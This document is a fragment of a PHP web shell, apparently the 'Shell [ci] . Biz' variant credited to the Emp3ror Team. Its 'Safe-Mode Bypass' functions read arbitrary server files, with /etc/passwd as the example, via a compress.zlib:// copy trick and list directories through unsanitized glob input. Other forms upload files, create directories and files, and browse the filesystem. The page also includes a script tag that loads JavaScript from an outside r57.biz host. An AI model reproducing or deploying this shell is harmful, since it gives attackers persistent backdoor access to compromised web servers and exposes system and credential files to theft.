<td width="50%" height="83" valign="top"><center> | |
<div align="center">Php Safe-Mode Bypass (Read Files) | |
</div><br> | |
<form action="<?php echo $surl; ?>"> | |
<div align="center"> | |
File: <input type="text" name="file" method="get"> <input type="submit" value="Read File"><br><br> eg: /etc/passwd<br> | |
<? | |
function rsg_read() | |
{ | |
$test=""; | |
$temp=tempnam($test, "cx"); | |
$file=$_GET['file']; | |
$get=htmlspecialchars($file); | |
echo "<br>Trying To Get File <font color=#000099><b>$get</b></font><br>"; | |
if(copy("compress.zlib://".$file, $temp)){ | |
$fichier = fopen($temp, "r"); | |
$action = fread($fichier, filesize($temp)); | |
fclose($fichier); | |
$source=htmlspecialchars($action); | |
echo "<div class=\"shell\"><b>Start $get</b><br><br><font color=\"white\">$source</font><br><b><br>Fin <font color=#000099>$get</font></b>"; | |
unlink($temp); | |
} else { | |
die("<FONT COLOR=\"RED\"><CENTER>Sorry... File | |
<B>".htmlspecialchars($file)."</B> dosen't exists or you don't have | |
access.</CENTER></FONT>"); | |
} | |
echo "</div>"; | |
} | |
if(isset($_GET['file'])) | |
{ | |
rsg_read(); | |
} | |
?> | |
<? | |
function rsg_glob() | |
{ | |
$chemin=$_GET['directory']; | |
$files = glob("$chemin*"); | |
echo "Trying To List Folder <font color=#000099><b>$chemin</b></font><br>"; | |
foreach ($files as $filename) { | |
echo "<pre>"; | |
echo "$filename\n"; | |
echo "</pre>"; | |
} | |
} | |
if(isset($_GET['directory'])) | |
{ | |
rsg_glob(); | |
} | |
?> | |
<br> | |
</div> | |
</form> | |
</td> | |
<td width="50%" height="83" valign="top"><center> | |
<center>Php Safe-Mode Bypass (List Directories): <form action="<?php echo $surl; ?>"> | |
<div align="center"><br> | |
Dir: <input type="text" name="directory" method="get"> <input type="submit" value="List Directory"><br><br> eg: /etc/<br> | |
</form></center> | |
</td> | |
</tr></TABLE><br> | |
<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#000000 borderColorLight=#c0c0c0 border=1> | |
<SCRIPT SRC=http://www.r57.biz/yazciz/ciz.js></SCRIPT> | |
<tr> | |
<td width="50%" height="1" valign="top"><center><b>:: <a href="<?php echo $surl; ?>act=search&d=<?php echo urlencode($d); ?>"><b>Search</b></a> ::</b><form method="POST"><input type=hidden name=act value="search"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="search_name" size="29" value="(.*)"> <input type="checkbox" name="search_name_regexp" value="1" checked> - regexp <input type=submit name=submit value="Search"></form></center></p></td> | |
<td width="50%" height="1" valign="top"><center><b>:: <a href="<?php echo $surl; ?>act=upload&d=<?php echo $ud; ?>"><b>Upload</b></a> ::</b><form method="POST" ENCTYPE="multipart/form-data"><input type=hidden name=act value="upload"><input type="file" name="uploadfile"><input type=hidden name="miniform" value="1"> <input type=submit name=submit value="Upload"><br><?php echo $wdt; ?></form></center></td> | |
</tr> | |
</table> | |
<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#000000 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center><b>:: Make Dir ::</b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="mkdir"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkdir" size="50" value="<?php echo $dispd; ?>"> <input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td><td width="50%" height="1" valign="top"><center><b>:: Make File ::</b><form method="POST"><input type=hidden name=act value="mkfile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkfile" size="50" value="<?php echo $dispd; ?>"><input type=hidden name="ft" value="edit"> <input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td></tr></table> | |
<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#000000 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center><b>:: Go Dir ::</b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="ls"><input type="text" name="d" size="50" value="<?php echo $dispd; ?>"> <input type=submit value="Go"></form></center></td><td width="50%" height="1" valign="top"><center><b>:: Go File ::</b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="gofile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="f" size="50" value="<?php echo $dispd; ?>"> <input type=submit value="Go"></form></center></td></tr></table> | |
<br><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#000000 borderColorLight=#c0c0c0 border=1><tr><td width="990" height="1" valign="top"><p align="center"><b>--[ Shell [ci] . Biz <?php echo $shver; ?> <a href="<?php echo $surl; ?>act=about"><u><b>Modded by</b></u></a> K1r4 @ gmail. com| <a href="http://emp3ror.com"><font color="#FF0000">Emp3ror Team</font></a><font color="#FF0000"></font> | Generation time: <?php echo round(getmicrotime()-starttime,4); ?> ]--</b></p></td></tr></table> | |
</body></html><?php chdir($lastdir); exit(); ?> | |
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